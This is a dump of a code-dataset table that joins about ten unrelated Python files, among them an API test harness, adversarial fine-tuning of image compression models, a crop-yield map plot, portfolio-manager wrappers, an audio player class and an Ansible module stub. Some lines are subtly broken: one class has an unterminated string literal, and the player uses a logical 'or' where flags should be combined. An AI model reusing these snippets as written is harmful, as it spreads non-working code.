content stringlengths 5 1.05M |
|---|
# todo rename
# todo docstring
# todo validate incoming data
# todo support multiple tests with arrays
import sys
sys.path.append('../src')
import logging
from pathlib import Path
import json
import requests
from dataclasses import dataclass
from app import routes
from models import Item
from models import Rating
from models import Preference
from models import Event
from models import Survey
validators = {
'/items': Item,
'/ratings': Rating,
'/preferences': Preference,
'/events': Event,
'/survey': Survey
}
@dataclass
class HTTPTest:
"""
Simple wrapper around `request`.
"""
route: str
method: str
data: dict
def run(self, host):
res = requests.request(
method=self.method,
url=host.strip('/') + '/' + self.route.strip('/'),
**{'params' if self.method == 'GET'
else 'json': self.data})
return res
# todo get object from response
# todo implement validation
@dataclass
class Loader:
"""
Loads test data for a given route and method.
"""
root = "./payloads"
ext = "json"
def load(self, route, method):
route_path = Path(self.root) / Path(route).name
file_name = f"{method.lower()}.{self.ext}"
test_path = route_path / file_name
data = json.loads(test_path.read_text())
return data
def run_tests():
loader = Loader()
host = "http://localhost:5000"
for route, resource, in routes.items():
for method in resource.__dict__['methods']:
try:
payload = loader.load(route, method)
except FileNotFoundError:
continue
# todo fix later
if route == '/ratings':
test = HTTPTest(route, method, payload)
print(test.run(host).text)
run_tests()
|
import os
import sys
import time
import argparse
from glob import glob
import torch
import torch.nn as nn
from torch.utils.tensorboard import SummaryWriter
import numpy as np
import random
from PIL import Image
from thop import profile
import model
from utils import torch_msssim, ops
from anchors import balle
from torchvision import datasets, transforms
from datetime import datetime
import coder
import lpips
def load_data(train_data_dir, train_batch_size):
train_transform = transforms.Compose([
#transforms.Resize(256),
#transforms.RandomResizedCrop(size=112),
transforms.ToTensor(),
])
train_dataset = datasets.ImageFolder(
train_data_dir,
transform=train_transform
)
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2**32
np.random.seed(worker_seed)
random.seed(worker_seed)
g = torch.Generator()
g.manual_seed(0)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=train_batch_size,
shuffle=True,
num_workers=8,
drop_last=True,
pin_memory=True,
worker_init_fn=seed_worker,
generator=g
)
return train_loader
def add_noise(x):
noise = np.random.uniform(-0.5, 0.5, x.size())
noise = torch.Tensor(noise).cuda()
return x + noise
def train(args, checkpoint_dir, CONTEXT=True, POSTPROCESS=True, crop=None):
TRAINING = True
dev_id = "cuda:0"
C = 3
ckpt_index = 0
batch_size = 8
# print('====> Encoding Image:', im_dir)
## model initalization
MODEL = args.model
quality = args.quality
arch_lists = ["factorized", "hyper", "context", "cheng2020", "nlaic", "elic"]
assert MODEL in arch_lists, f"'{MODEL}' not in {arch_lists} for param '-m'"
if MODEL == "elic":
image_comp = model.ImageCompression(256)
image_comp.load_state_dict(torch.load(checkpoint_dir), strict=False)
image_comp.to(dev_id).eval()
print("[ ARCH ]:", MODEL)
if MODEL in ["factorized", "hyper", "context", "cheng2020"]:
image_comp = balle.Image_coder(MODEL, quality=quality, metric=args.metric, pretrained=args.download).to(dev_id)
print("[ ARCH ]:", MODEL, quality, args.metric)
if args.download == False:
print("[ CKPTS ]:", args.ckpt)
image_comp.load_state_dict(torch.load(args.ckpt))
image_comp.to(dev_id).train()
else:
print("[ CKPTS ]: Download from CompressAI Model Zoo", )
# image_comp = nn.DataParallel(image_comp, device_ids=[0])
if args.metric == "ms-ssim":
loss_func = torch_msssim.MS_SSIM(max_val=1).to(dev_id)
lamb = args.lamb_attack
# lr_decay_iters = [70-ckpt_index,80-ckpt_index,90-ckpt_index,95-ckpt_index]
lr_decay_iters = [600,1200,1800]
decay_gamma = 0.33
noise_thres = args.noise
print("Lambda:", lamb)
N_ADV=0
print(f"num of ori/adv examples: {N_ADV}/{8-N_ADV}")
if args.metric == "mse":
lamb = lamb * 255. * 255.
#Augmentated Model
print("Refine with Adversarial examples")
model_dir = f"{args.model}-{args.quality}"
ckpt_dir = f"./ckpts/attack/{model_dir}/iter/{args.metric}"
# optimizer
parameters = set(p for n, p in image_comp.named_parameters() if not n.endswith(".quantiles"))
aux_parameters = set(p for n, p in image_comp.named_parameters() if n.endswith(".quantiles"))
optimizer = torch.optim.Adam(parameters, lr=args.lr_train)
aux_optimizer = torch.optim.Adam(aux_parameters, lr=1e-3)
# optimizer = torch.optim.Adam(image_comp.parameters(),lr=args.lr_attack)
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, lr_decay_iters, gamma=decay_gamma, last_epoch=-1)
for epoch in range(1):
bpp_epoch, loss_epoch = 0., 0.
train_loader = load_data(f'/workspace/ct/datasets/datasets/div2k', batch_size)
for step, (batch_x, targets) in enumerate(train_loader):
# noise_thres = min(args.noise, 0.00001 + (args.noise-0.00001)*step/500)
noise_thres = args.noise
t = time.time()
batch_x = batch_x.to('cuda')
num_pixels = batch_x.size()[0]*batch_x.size()[2]*batch_x.size()[3]
# generate batch_x_adv
im_s = batch_x[N_ADV:,:,:,:]
noise = torch.zeros(im_s.size())
noise = noise.cuda().requires_grad_(True) # set requires_grad=True after moving tensor to device
adv_optimizer = torch.optim.Adam([noise],lr=args.lr_attack)
lr_adv_scheduler = torch.optim.lr_scheduler.MultiStepLR(adv_optimizer, [300,600,900], gamma=0.33, last_epoch=-1)
noise_range = 0.5
for i in range(args.steps):
noise_clipped = ops.Up_bound.apply(ops.Low_bound.apply(noise, -noise_range), noise_range)
im_in = ops.Up_bound.apply(ops.Low_bound.apply(im_s+noise_clipped, 0.), 1.)
y_main = image_comp.net.g_a(im_in)
x_ = image_comp.net.g_s(y_main)
output_ = ops.Up_bound.apply(ops.Low_bound.apply(x_, 0.), 1.)
loss_i = torch.mean((im_s - im_in) * (im_s - im_in))
# loss_o = 1. - torch.mean((im_in - output_) * (im_in - output_)) # MSE(x_, y_)
loss_o = 1. - torch.mean((im_s - output_) * (im_s - output_)) # MSE(x_, y_)
# if i==999:
# print(loss_i.item(), loss_o.item())
if loss_i >= noise_thres:
loss = loss_i
else:
loss = loss_o
adv_optimizer.zero_grad()
loss.backward()
adv_optimizer.step()
lr_adv_scheduler.step()
im_uint8 = torch.round(im_in * 255.0)/255.0
batch_x_new = batch_x.detach()
batch_x_new[N_ADV:] = torch.clamp(im_uint8, min=0., max=1.0).detach()
output, y_main, y_hyper, p_main, p_hyper = image_comp(batch_x_new, TRAINING, CONTEXT, POSTPROCESS)
# lpips_loss = torch.mean(loss_func(batch_x, output))
if args.metric == "ms-ssim":
dloss = 1. - loss_func(batch_x_new, output)
if args.metric == "mse":
dloss = torch.mean((batch_x_new - output)**2)
train_bpp_hyper = torch.sum(torch.log(p_hyper)) / (-np.log(2.) * num_pixels)
train_bpp_main = torch.sum(torch.log(p_main)) / (-np.log(2.) * num_pixels)
bpp = train_bpp_main + train_bpp_hyper
# loss = dloss + lamb * bpp
## about lambda: https://interdigitalinc.github.io/CompressAI/zoo.html
# [q3 - mse: 0.0067 * 255^2]
# [q3 - mssim: 8.73]
loss = lamb * dloss + bpp
optimizer.zero_grad()
aux_optimizer.zero_grad()
loss.backward()
optimizer.step()
aux_loss = image_comp.net.entropy_bottleneck.loss()
aux_loss.backward()
aux_optimizer.step()
bpp_epoch += bpp.item()
loss_epoch += loss.item()
print('step:', step, 'loss:', loss.item(), "distortion:", dloss.item(), 'rate:', bpp.item(), 'time:', time.time()-t, "noise thres:", noise_thres)
if step % 100 == 0:
# torch.save(image_comp.module.state_dict(), os.path.join(ckpt_dir,'ae_%d_%d_%0.8f_%0.8f.pkl' % (epoch, step, loss_epoch/(step+1), bpp_epoch/(step+1))))
torch.save(image_comp.state_dict(), os.path.join(ckpt_dir,'ae_%d_%d_%0.8f_%0.8f.pkl' % (epoch, step, loss_epoch/(step+1), bpp_epoch/(step+1))))
lr_scheduler.step()
# torch.save(image_comp.module.state_dict(), os.path.join(ckpt_dir,'ae_%d_%0.8f_%0.8f.pkl' % (epoch, loss_epoch/(step+1), bpp_epoch/(step+1))))
torch.save(image_comp.state_dict(), os.path.join(ckpt_dir,'ae_%d_%0.8f_%0.8f.pkl' % (epoch, loss_epoch/(step+1), bpp_epoch/(step+1))))
if __name__ == "__main__":
args = coder.config()
checkpoint = None
if args.model == "nonlocal":
checkpoint = glob('./ckpts/%d_%s/ae_%d_*' %(int(args.lamb), args.job, args.ckpt_num))[0]
print("[CONTEXT]:", args.context)
print("==== Loading Checkpoint:", checkpoint, '====')
train(args, checkpoint, CONTEXT=args.context, POSTPROCESS=args.post, crop=None)
# print(checkpoint, "bpps:%0.4f, psnr:%0.4f" %(bpp, psnr)) |
from .statistics import Statistics
async def setup(bot):
cog = Statistics(bot)
await cog.initialize()
bot.add_cog(cog)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 09 13:06:12 2016
@author: jrl276
"""
import geojson
from descartes import PolygonPatch
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import matplotlib.cm as cm
import matplotlib as mpl
import numpy as np
#Define GCAM regions
region = {'Russian Fed':24,'Canada':8,'Usa':32,'Norway':17,'Finland':14,'Sweden':14,'Iceland':17,'Estonia':13,'Uk':14,'Latvia':13,'Denmark':14,'Kazakhstan':10,'Lithuania':13,'Ireland':14,'Germany':14,'Belarus':15,'Netherlands':14,'China':11,'Bel-lux':14,'Mongolia':10,'France':14,'Slovakia':13,'Poland':13,'Czech Rep':13,'Ukraine':15,'Austria':14,'Moldova Rep':15,'Hungary':13,'Romania':13,'Italy':14,'Switzerland':17,'Slovenia':13,'Croatia':16,'Bosnia Herzg':16,'Yugoslav Fr':16,'Japan':20,'Spain':14,'Georgia':10,'Andorra':14,'Bulgaria':13,'Kyrgyzstan':10,'Portugal':14,'Macedonia':16,'Turkey':16,'Azerbaijan':10,'Turkmenistan':10,'Uzbekistan':10,'North Korea':30,'Albania':16,'Greece':14,'Armenia':10,'Tajikistan':10,'Iran':22,'Afghanistan':28,'Syria':22,'Iraq':22,'Algeria':2,'Tunisia':2,'Pakistan':23,'South Korea':29,'Morocco':2,'Egypt':2,'Lybia':2,'Lebanon':22,'India':18,'Libya':2,'Israel':22,'Mexico':21,'Jordan':22,'Nepal':28,'Kuwait':22,'Saudi Arabia':22,'Myanmar':30,'Bhutan':28,'Western Sahara':2,'Bangladesh':28,'Mauritania':4,'Qatar':22,'Untd Arab Em':22,'Mali':4,'Cuba':9,'Laos':28,'Hong Kong':11,'Viet Nam':30,'Australia':6,'Niger':4,'Haiti':9,'Dominican Rp':9,'Chad':4,'Sudan':1,'Oman':22,'Thailand':30,'Philippines':30,'Belize':9,'Senegal':4,'Guatemala':9,'Honduras':9,'Burkina Faso':4,'Brazil':7,'New Zealand':6,'Eritrea':1,'El Salvador':9,'Panama':9,'Ethiopia':1,'Kenya':1,'Gambia':4,'Nigeria':4,'Liberia':4,'Cambodia':30,'Guineabissau':4,'Yemen':22,'Guinea':4,'Cameroon':4,'Nicaragua':9,'Colombia':12,'Venezuela':26,'Suriname':26,'Djibouti':1,'Somalia':1,'Costa Rica':9,'Aruba':9,'Trinidad Tob':9,'Ghana':4,'Togo':4,'Benin':4,'Cent Afr Rep':4,'Cote Divoire':4,'Sri Lanka':28,'Sierra Leone':4,'Zaire':4,'Brunei Darsm':30,'Guyana':26,'Uganda':1,'Fr Guiana':26,'Eq Guinea':4,'Indonesia':19,'Malaysia':30,'Singapore':30,'Ecuador':27,'Rwanda':1,'Tanzania':3,'Gabon':4,'Congo':4,'Burundi':1,'Peru':27,'Bolivia':27,'Chile':27,'Angola':3,'Papua N Guin':30,'Zambia':3,'Malawi':3,'Mozambique':3,'Namibia':3,'Madagascar':1,'Zimbabwe':3,'Lesotho':3,'Botswana':3,'Swaziland':3,'Paraguay':27,'Uruguay':27,'Argentina':5,'South Africa':25}
#Load in Data
l = np.loadtxt('../data/SSP1_Yield_Improve.txt')
#Define Colormap
norm = mpl.colors.Normalize(vmin=-115, vmax=190)
cmap = cm.RdYlGn
colors=cm.ScalarMappable(norm=norm, cmap=cmap)
colors.set_array(l)
a = colors.to_rgba(l)
a = np.reshape(a,[32,18,4])
#Load in geojson file
with open("../data/aez-w-greenland.geojson") as json_file:
json_data = geojson.load(json_file)
#Create Figure
plt.clf()
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
#Set basemap
m = Basemap(projection='robin', lon_0=0,resolution='c')
m.drawmapboundary(fill_color='white', zorder=-1)
m.drawparallels(np.arange(-90.,91.,30.), labels=[1,0,0,1], dashes=[1,1], linewidth=0.25, color=[0.5,0.5,0.5,0.35],fontsize=14)
m.drawmeridians(np.arange(0., 360., 60.), labels=[1,0,0,1], dashes=[1,1], linewidth=0.25, color=[0.5,0.5,0.5,0.35],fontsize=14)
m.drawcoastlines(color='0.6', linewidth=1)
#Color GCAM AEZ regions
for i in range(2799):
coordlist = json_data.features[i]['geometry']['coordinates'][0]
if i < 2796:
name = json_data.features[i]['properties']['CTRYNAME']
aez = json_data.features[i]['properties']['AEZ']
for j in range(len(coordlist)):
for k in range(len(coordlist[j])):
coordlist[j][k][0],coordlist[j][k][1]=m(coordlist[j][k][0],coordlist[j][k][1])
poly = {"type":"Polygon","coordinates":coordlist}#coordlist
color1 = a[region[name]-1,int(aez)-1,:]
EK = 'none'
if i>=2796:
color1=[1,1,1,1]
ax.add_patch(PolygonPatch(poly, fc=color1, ec=EK, zorder=2 ))
#Annotate
ax.set_title('SSP1 Maize Yield Improvement',fontsize=25,y=1.01)#GDP Adjusted Policy Cost#Policy Cost#Policy Cost Reduction from Technology
plt.annotate(2100,xy=(0.15,0.2),xytext=(0.15,0.2),xycoords='axes fraction',fontsize=30)
cb = m.colorbar(colors,'right')
cb.ax.tick_params(labelsize=14)
cb.set_label('Percent Change from Reference',fontsize=16,rotation=270,labelpad=20)#cb.set_label('Trillion 1990 USD',fontsize=16,rotation=270,labelpad=20)
#Save Figure
ax.axis('scaled')
plt.draw()
plt.show()
fig.savefig('test.pdf',format='pdf') |
class Manipulation():
''' Data Manipulation '''
def __init__(self, data):
self.data = data
self.badPattern = '''
self.goodPattern = "'"
self.filteredKey = ['artist_name', 'title']
### STATIC METHODS
def findStringAndReplace(self, oldStr, pattern, newStr):
return oldStr.replace(pattern, newStr)
### INSTANCE METHODS
def filterDataByKeys(self):
newArr = []
for d in self.data:
filterData = { x: d[x] for x in d.keys() if x in self.filteredKey }
for key in self.filteredKey:
filterData[key] = self.findStringAndReplace(filterData[key], self.badPattern, self.goodPattern)
newArr.append(filterData)
return newArr
|
from .alarm_clock import alarm_clock |
from precise.skaters.managers.ppomanagerfactory import ppo_ewa_long_manager_factory, ppo_pm_long_manager_factory, ppo_long_manager_factory
from precise.skaters.covariance.bufsk import buf_sk_glcv_pcov_d0_n100, buf_sk_glcv_pcov_d0_n100_t0, buf_sk_lw_pcov_d0_n100, buf_sk_mcd_pcov_d0_n100, buf_sk_lw_pcov_d1_n100
# PyPortfolioOpt managers
def ppo_pm_t0_d0_r025_n50_vol_long_manager(y, s, k=1, e=1):
assert k == 1
return ppo_pm_long_manager_factory(y=y, s=s, method='min_volatility', target=0, e=e, r=0.025, n_emp=50)
def ppo_ewa_d0_r025_n50_vol_long_manager(y, s, k=1, e=1):
assert k == 1
return ppo_ewa_long_manager_factory(y=y, s=s, method='min_volatility', e=e, r=0.025, n_emp=50)
def ppo_pm_t0_d0_r025_n50_quad_long_manager(y, s, k=1, e=1):
assert k == 1
return ppo_pm_long_manager_factory(y=y, s=s, method='max_quadratic_utility', target=0, e=e, r=0.025, n_emp=50)
def ppo_ewa_d0_r025_n50_quad_long_manager(y, s, k=1, e=1):
assert k == 1
return ppo_ewa_long_manager_factory(y=y, s=s, method='max_quadratic_utility', e=e, r=0.025, n_emp=50)
def ppo_pm_t0_d0_r025_n50_sharpe_long_manager(y, s, k=1, e=1):
assert k == 1
return ppo_pm_long_manager_factory(y=y, s=s, method='max_sharpe', target=0, e=e, r=0.025, n_emp=50)
def ppo_ewa_d0_r025_n50_sharpe_long_manager(y, s, k=1, e=1):
assert k == 1
return ppo_ewa_long_manager_factory(y=y, s=s, method='max_sharpe', e=e, r=0.025, n_emp=50)
# Sklearn with min vol
def ppo_sk_lw_pcov_d1_n100_vol_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_lw_pcov_d0_n100, e=e, method='min_volatility')
def ppo_sk_glcv_pcov_d0_n100_vol_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100, e=e, method='min_volatility')
def ppo_sk_glcv_pcov_d0_n100_t0_vol_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100_t0, e=e, method='min_volatility')
def ppo_sk_mcd_pcov_d0_n100_vol_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_mcd_pcov_d0_n100, e=e, method='min_volatility')
# Sklearn with quadratic util
def ppo_sk_lw_pcov_d0_n100_quad_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_lw_pcov_d0_n100, e=e, method='max_quadratic_utility')
def ppo_sk_glcv_pcov_d0_n100_quad_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100, e=e, method='max_quadratic_utility')
def ppo_sk_glcv_pcov_d0_n100_t0_quad_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100_t0, e=e, method='max_quadratic_utility')
def ppo_sk_mcd_pcov_d0_n100_quad_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_mcd_pcov_d0_n100, e=e, method='max_quadratic_utility')
# Sklearn with max sharpe
def ppo_sk_lw_pcov_d0_n100_sharpe_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_lw_pcov_d0_n100, method='max_sharpe')
def ppo_sk_glcv_pcov_d0_n100_sharpe_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100, method='max_sharpe')
def ppo_sk_glcv_pcov_d0_n100_t0_sharpe_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_glcv_pcov_d0_n100_t0, method='max_sharpe')
def ppo_sk_mcd_pcov_d0_n100_sharpe_long_manager(y, s, k=1, e=1):
return ppo_long_manager_factory(y=y,s=s,f=buf_sk_mcd_pcov_d0_n100, method='max_sharpe')
PPO_LONG_MANGERS = [ppo_pm_t0_d0_r025_n50_vol_long_manager,
ppo_ewa_d0_r025_n50_vol_long_manager,
ppo_pm_t0_d0_r025_n50_quad_long_manager,
ppo_ewa_d0_r025_n50_quad_long_manager,
ppo_ewa_d0_r025_n50_quad_long_manager,
ppo_pm_t0_d0_r025_n50_sharpe_long_manager,
ppo_ewa_d0_r025_n50_sharpe_long_manager,
ppo_sk_lw_pcov_d1_n100_vol_long_manager,
ppo_sk_glcv_pcov_d0_n100_vol_long_manager,
ppo_sk_glcv_pcov_d0_n100_t0_vol_long_manager,
ppo_sk_mcd_pcov_d0_n100_vol_long_manager,
ppo_sk_lw_pcov_d0_n100_quad_long_manager,
ppo_sk_glcv_pcov_d0_n100_quad_long_manager,
ppo_sk_glcv_pcov_d0_n100_t0_quad_long_manager,
ppo_sk_mcd_pcov_d0_n100_quad_long_manager,
ppo_sk_lw_pcov_d0_n100_sharpe_long_manager,
ppo_sk_glcv_pcov_d0_n100_sharpe_long_manager,
ppo_sk_glcv_pcov_d0_n100_t0_sharpe_long_manager,
ppo_sk_mcd_pcov_d0_n100_sharpe_long_manager]
|
import sys
import time
from pathlib import Path
from loguru import logger
from magic import from_file
from scribepy.pybass.pybass import *
from scribepy.pybass.pybass_aac import (
BASS_AAC_StreamCreateFile,
BASS_MP4_StreamCreateFile,
)
from scribepy.pybass.pybassflac import BASS_FLAC_StreamCreateFile
from scribepy.pybass.pybass_tta import BASS_TTA_StreamCreateFile
from scribepy.pybass.pybass_alac import BASS_ALAC_StreamCreateFile
from scribepy.pybass.pybass_ac3 import BASS_AC3_StreamCreateFile
player_module = Path(__file__).parent
fx_module = ctypes.CDLL(f"{player_module}/BASS_modules/libbass_fx.so")
fx_func_type = ctypes.CFUNCTYPE
BASS_ATTRIB_TEMPO = 0x10000
BASS_FX_FREESOURCE = 0x10000
BASS_FX_TempoCreate = func_type(HSTREAM, ctypes.c_ulong, ctypes.c_ulong)(
("BASS_FX_TempoCreate", fx_module)
)
def get_module_to_use(ext):
"""
Get module to use according to file extension.
Arguments:
ext: Extension of the file.
Returns:
BASS module to use to create stream
"""
return {
"audio/x-hx-aac-adts": BASS_AAC_StreamCreateFile,
"audio/flac": BASS_FLAC_StreamCreateFile,
"audio/x-m4a": BASS_ALAC_StreamCreateFile,
"audio/x-wav": BASS_StreamCreateFile,
"audio/ogg": BASS_StreamCreateFile,
"audio/mpegapplication/octet-stream": BASS_StreamCreateFile,
"video/mp4": BASS_MP4_StreamCreateFile,
"application/octet-stream": BASS_TTA_StreamCreateFile,
"audio/vnd.dolby.dd-raw": BASS_AC3_StreamCreateFile,
}[ext]
class Player:
"""
A class to interact with pybass module.
"""
def __init__(self):
logger.debug("Try to initialize BASS")
if not BASS_Init(-1, 44100, 0, 0, 0):
logger.exception(
f"BASS INITIALIZATION ERROR { get_error_description(BASS_ErrorGetCode()) }"
)
print(
"BASS INITIALIZATION ERROR",
get_error_description(BASS_ErrorGetCode()),
)
sys.exit(0)
self.stream = None
self.tempo = 0
def __del__(self):
self.destruct()
@property
def handle(self):
"""
Return a file stream if exists or create one if it doesn't already exist.
Returns:
BASS channel stream.
"""
if self.stream is None:
self.create_file_stream("")
return self.stream
@handle.deleter
def handle(self):
self.destruct()
def create_file_stream(self, file):
"""
Create sample stream from file and add Tempo effect to it.
Arguments:
file: File to create stream from.
( MP3, MP2, MP1, OGG, WAV, AIFF or plugin supported file).
Returns:
None if successful or error dictionary if unsuccessful.
"""
# stream = BASS_StreamCreateFile(False, bytes(file), 0, 0, BASS_STREAM_DECODE)
logger.debug("Try to create BASS stream from file")
try:
f = Path(file)
file_extension = from_file(str(f), mime=True)
module = get_module_to_use(file_extension)
stream = module(
False, bytes(f), 0, 0, BASS_STREAM_DECODE or BASS_UNICODE
)
# stream = BASS_AAC_StreamCreateFile(False, bytes(file), 0, 0, 0)
self.stream = BASS_FX_TempoCreate(stream, BASS_FX_FREESOURCE)
logger.success(f"Created stream from {f}")
except KeyError as error:
logger.exception(error)
self.destruct()
return {"error": f"{Path(f).suffix} files are not supported"}
except IsADirectoryError as error:
logger.exception(error)
return {"error": f"{Path(f)} is a directory"}
def destruct(self):
"""
Stop stream if playing or paused and free the sample stream's resources.
Returns:
None.
"""
try:
status = BASS_ChannelIsActive(self.handle)
if status == BASS_ACTIVE_PLAYING or status == BASS_ACTIVE_PAUSED:
self.stop()
retval = BASS_StreamFree(self.handle)
self.stream = None
except ctypes.ArgumentError as error:
logger.exception(error)
self.stream = None
def play(self, restart=False):
"""
Start (or resume) playback of a sample.
Arguments:
restart: Whether to restart playback from beginning.
Returns:
True if successful else False.
"""
logger.debug("Play stream")
try:
return BASS_ChannelPlay(self.stream, restart)
except Exception as error:
logger.exception(error)
return False
def pause(self):
"""
Pause the stream.
Returns:
True if successful else False.
"""
logger.debug("Pause Stream")
try:
return BASS_ChannelPause(self.handle)
except Exception as error:
# Log errors
logger.exception(error)
return False
def stop(self):
"""
Stop the stream.
Returns:
True if successful else False.
"""
logger.debug("Stop Stream")
try:
return BASS_ChannelStop(self.handle)
except Exception as error:
logger.exception(error)
return False
@property
def length(self):
"""
Get length of stream in Seconds.
Returns:
Length of stream.
"""
_len = BASS_ChannelGetLength(self.handle, BASS_POS_BYTE)
slen = BASS_ChannelBytes2Seconds(self.handle, _len)
return slen
@property
def length_time(self):
"""
Get length of stream in human readable format (MM:SS) .
Returns:
Length of stream.
"""
seconds = int(self.length % 60)
minutes = int(self.length // 60)
return f"{minutes:02}:{seconds:02}"
@property
def position(self):
"""
Get the position of the stream in seconds.
Returns:
Position of stream.
"""
try:
buf = BASS_ChannelGetPosition(self.handle, BASS_POS_BYTE)
sbuf = BASS_ChannelBytes2Seconds(self.handle, buf)
return sbuf
except Exception as error:
logger.debug("Get position of stream")
logger.exception(error)
return False
@property
def position_time(self):
"""
Get the position of the stream in human readable format (MM:SS)
Returns:
Position of stream.
"""
seconds = int(self.position % 60)
minutes = int(self.position // 60)
return f"{minutes:02}:{seconds:02}"
@property
def position_bytes(self):
"""
Get the position of the stream in bytes.
Returns:
Position of stream in bytes.
"""
return BASS_ChannelGetPosition(self.handle, BASS_POS_BYTE)
@property
def remaining(self):
"""
Get remaining time.
Return:
Remaining time in seconds
"""
return self.length - self.position
@property
def remaining_time(self):
"""
Get remaining time in human readable format.
Return:
Remaining time in human readable format (MM:SS)
"""
seconds = int(self.remaining % 60)
minutes = int(self.remaining // 60)
return f"{minutes:02}:{seconds:02}"
def isPaused(self):
status = BASS_ChannelIsActive(self.handle)
return status == BASS_ACTIVE_PAUSED
def isPlaying(self):
status = BASS_ChannelIsActive(self.handle)
return status == BASS_ACTIVE_PLAYING
def pause_play_toggle(self):
"""
Toggle play/pause
Returns:
None.
"""
status = BASS_ChannelIsActive(self.handle)
if status == BASS_ACTIVE_PAUSED:
self.play()
elif status == BASS_ACTIVE_PLAYING:
self.pause()
def move_to_position_bytes(self, pos):
"""
Set the playback position.
Arguments:
pos: Position to set to (using bytes as units).
Returns:
True if successful else False.
"""
logger.debug("Move to position 'pos' in stream (using bytes)")
try:
return BASS_ChannelSetPosition(self.handle, pos, BASS_POS_BYTE)
except Exception as error:
logger.exception(error)
return False
def move_to_position_seconds(self, pos):
"""
Set the playback position.
Arguments:
pos: Position to set to (using seconds as units).
Returns:
True if successful else False.
"""
logger.debug("Move to position 'pos' in stream (using seconds)")
try:
bytes = BASS_ChannelSeconds2Bytes(self.handle, pos)
return BASS_ChannelSetPosition(self.handle, bytes, BASS_POS_BYTE)
except Exception as error:
logger.exception(error)
return False
def seek_by_bytes(self, s):
"""
Seek playback from current position.
Arguments:
s: Bytes to seek.
returns:
None.
"""
self.move_to_position_bytes(self.position_bytes + (s * 124000))
def seek(self, s):
"""
Seek playback from current position.
Arguments:
s: Seconds to seek.
returns:
None.
"""
if (s < 0 and abs(s) > self.position):
self.seek(s/2)
elif (self.remaining > 0 and s > self.remaining):
self.seek(s/2)
self.move_to_position_seconds(self.position + s)
def change_tempo(self, s):
"""
Change tempo of stream.
Arguments:
s: Add tempo by
Returns:
True if successful else False.
"""
logger.debug("Change stream tempo/speed")
self.tempo += s
try:
return BASS_ChannelSetAttribute(
self.stream, BASS_ATTRIB_TEMPO, self.tempo
)
except Exception as error:
# Log error
logger.exception(error)
return False
def restore_tempo(self):
"""
Restore tempo of stream.
Returns:
True if successful else False.
"""
logger.debug("Restore original stream tempo")
self.tempo = 0
try:
return BASS_ChannelSetAttribute(
self.stream, BASS_ATTRIB_TEMPO, self.tempo
)
except Exception as error:
logger.exception(error)
return False
@property
def volume(self):
"""
Master Output Volume.
Returns:
Master current volume level.
"""
return BASS_GetVolume()
def set_volume(self, volume):
"""
Set Output Master Volume.
Arguments:
volume: The volume level to set to.
Returns:
True if successful else False.
"""
return BASS_SetVolume(volume)
|
import heapq
n, k = map(int, input().split())
hq = []
for _ in range(n):
a, b = map(int, input().split())
heapq.heappush(hq, (a, b))
# print(hq)
ans = 0
for _ in range(k):
time = heapq.heappop(hq)
ans += time[0]
heapq.heappush(hq, (time[0]+time[1], time[1]))
print(ans)
|
"""Update test files
Temporary helper script
Copyright (c) 2020 Peter Triesberger.
For further information see https://github.com/peter88213/yW2OO
Published under the MIT License (https://opensource.org/licenses/mit-license.php)
"""
import os
find = '''<office:font-face-decls>
<style:font-face style:name="StarSymbol" svg:font-family="StarSymbol" style:font-charset="x-symbol"/>
<style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-adornments="Standard" style:font-family-generic="modern" style:font-pitch="fixed"/>
</office:font-face-decls>
'''
replace = '''<office:font-face-decls>
<style:font-face style:name="StarSymbol" svg:font-family="StarSymbol" style:font-charset="x-symbol"/>
<style:font-face style:name="Consolas" svg:font-family="Consolas" style:font-adornments="Standard" style:font-family-generic="modern" style:font-pitch="fixed"/>
<style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-adornments="Standard" style:font-family-generic="modern" style:font-pitch="fixed"/>
</office:font-face-decls>
'''
# documents = f{os.environ['USERPROFILE']}\\Documents'
documents = '../test/data'
pathList = []
for (path, dirs, files) in os.walk(documents):
for file in files:
if file == 'content.xml':
filepath = (f'{path}/{file}').replace('\\', '/')
with open(filepath, 'r', encoding='utf-8') as f:
text = f.read()
modified = False
if find in text:
modified = True
text = text.replace(find, replace)
if modified:
with open(filepath, 'w', encoding='utf-8') as f:
f.write(text)
print(f'{filepath} written\n')
else:
print(f'--- {filepath} skipped\n')
|
#!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = r'''
module: goodbye_world
short_description: goodbye world
author:
- "Nathan Weatherly (@nathanweatherly)"
description:
- Says goodbye to goodbye_target, returning a full greeting string.
options:
goodbye_target:
description:
- This field is the name to greet.
- It is a string.
- The default target is world
- Fourth line of description.
type: str
default: world
required: False
'''
EXAMPLES = r'''
- name: "Say goodbye to program"
nathanweatherly.totally_not_fake.goodbye_world:
goodbye_target: Program
register: full_goodbye
- name: "Say goodbye to World"
nathanweatherly.totally_not_fake.goodbye_world:
register: full_goodbye
'''
RETURN = r'''
full_goodbye:
description: Full parting to goodbye_target
returned: success
type: str
'''
